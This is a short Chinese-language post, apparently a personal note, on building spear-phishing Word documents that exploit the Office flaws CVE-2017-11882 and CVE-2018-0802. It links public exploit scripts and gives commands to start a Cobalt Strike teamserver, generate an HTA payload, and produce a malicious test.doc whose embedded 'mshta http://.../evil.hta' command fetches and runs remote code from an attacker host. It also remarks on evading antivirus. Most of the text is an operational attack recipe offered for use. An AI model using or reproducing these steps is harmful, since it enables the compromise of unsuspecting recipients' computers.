看了一天apt报告,主流利用Office鱼叉攻击的漏洞,还是这Microsoft Office CVE-2017-8570,CVE-2017-11882和CVE-2018-0802 三个,而且都知道office一般都不更新,很容易打开就中。但是doc免杀比较难,很容易被杀,比如主流的mshta这种方式。
利用脚本:
https://github.com/denmilu/CVE-2018-0802_CVE-2017-11882 这个脚本集成了两个漏洞
https://github.com/rxwx/CVE-2018-0802
https://github.com/Ridter/CVE-2017-11882/
也可以使用msf模块。
sudo apt install openjdk-8-jre-headless 不建议使用openjdk
具体环境安装可以参考cobalt strike官方。https://www.cobaltstrike.com/help-java-dependency
chmod +x teamserver
nohup ./teamserver IP 密码 &
先使用cobalt strike 生成一个hta的payload
python webdav_exec_CVE-2017-11882.py -u http://xxxxx.xx.xxx:8001/evil.hta -e "mshta http://xxxx.x.x.x.x:8001/evil.hta" -o test.doc
python RTF_11882_0802.py -c "mshta http://xx.xxx.xx.xx:8001/evil.hta" -o test.doc